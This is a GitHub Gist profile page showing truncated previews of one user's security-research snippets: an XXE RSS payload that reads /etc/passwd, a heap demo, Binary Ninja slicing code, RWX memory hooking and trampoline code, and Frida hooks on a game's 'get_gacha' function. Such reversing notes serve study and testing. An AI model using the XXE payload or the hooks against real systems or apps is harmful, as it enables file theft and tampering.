Skip to content

Instantly share code, notes, and snippets.

View sl4v's full-sized avatar

sl4v sl4v

4 followers · 1 following
View GitHub Profile
@sl4v
sl4v / xxe.rss
Created October 30, 2015 07:03
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
@sl4v
sl4v / heap-demo.c
Created June 22, 2022 18:08
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main()
{
puts("Basic allocation example.\n");
char* a = malloc(0x10);
strcpy(a, "AAAAAAAAAAAAAAA"); // A * 15
char* b = malloc(0x12);
memcpy(b, "BBBBBBBBBBBBBBBBBBBBBBBB", 24); // B * 23
@sl4v
sl4v / slicer_bw.py
Created May 19, 2018 15:18
from binaryninja import *
class Slicer():
def __init__(self, instruction):
self.visited = set()
self.instruction = instruction
self.function = instruction.function
def visit_backward(self, instruction):
for var in instruction.vars_read:
@sl4v
sl4v / slicer_init.py
Created May 19, 2018 15:08
class Slicer():
def __init__(self, instruction):
self.visited = set()
self.instruction = instruction
self.function = instruction.function
@sl4v
sl4v / LoadLibrary.c
Last active December 14, 2017 21:01
HMODULE user32 = LoadLibrary("user32.dll");
MsgBox = GetProcAddress(user32, "MessageBoxA");
MsgBox(NULL, "Text", "Caption", 0, 0);
@sl4v
sl4v / hook_payload_test.c
Last active December 14, 2017 20:51
uint8_t payload[] = {
0x48, 0xb8, 0x48, 0x47, 0x46, 0x45, 0x44, 0x43, 0x42, 0x41, // movabs rax, 0x4142434445464748
0x48, 0x89, 0x02 // mov qword ptr [rdx], rax
};
LPVOID pHookBody = myVirtualAlloc(0x1000, PAGE_EXECUTE_READWRITE);
hook_body_offset = pHookBody;
// copy payload
myVirtualProtect((LPVOID)sectionInfo.SectionAddress, sectionInfo.SectionSize, PAGE_EXECUTE_READWRITE, &dwOldProtect);
@sl4v
sl4v / calc_damaged_instructions.c
Created December 14, 2017 00:00
int calc_damaged_instructions(uint8_t *data, size_t len_erased) {
size_t max_len = 50;
size_t decoded_len = 0;
// Initialize decoder context.
ZydisDecoder decoder;
ZydisDecoderInit(
&decoder,
ZYDIS_MACHINE_MODE_LONG_64,
ZYDIS_ADDRESS_WIDTH_64);
@sl4v
sl4v / get_bait_code.c
Created December 13, 2017 23:49
int get_bait_code(uint8_t * trampoline_code_out, uint64_t addr) {
uint8_t trampoline_code[] =
{
0x68, 0x44, 0x33, 0x22, 0x11, // push 0x11223344
0xc7, 0x44, 0x24, 0x04, 0x88, 0x77, 0x66, 0x55, //mov dword ptr [rsp+4], 0x55667788
0xc3 //ret
};
uint32_t addr_right = (uint32_t)(addr & 0xffffffff);
uint32_t addr_left = (uint32_t)((addr & 0xffffffff00000000) >> 32);
@sl4v
sl4v / get-gacha.js
Created June 25, 2017 10:35
{
onEnter: function (log, args, state) {
log("get_gacha(" + args[0].toInt32() + "," + args[1].toInt32() + "," + args[2].toInt32() + "," + ")");
this.args1 = args[1];
this.args2 = args[2];
var myfunc = new NativeFunction(Module.findExportByName('libnative-lib.so', 'get_gacha'), 'uint32', ['uint32', 'pointer', 'pointer']);
log('-----');
a1 = Memory.alloc(4);
@sl4v
sl4v / frida1.js
Last active June 25, 2017 10:09
{
onEnter: function (log, args, state) {
log("get_gacha(" + args[0].toInt32() + "," + args[1].toInt32() + "," + args[2].toInt32() + "," + ")");
log(hexdump(args[1], { length: 4 }));
log(hexdump(args[2], { length: 4 }));
this.args1 = args[1];
this.args2 = args[2];
}
onLeave: function (log, retval, state) {
log(hexdump(this.args1, { length: 1 }));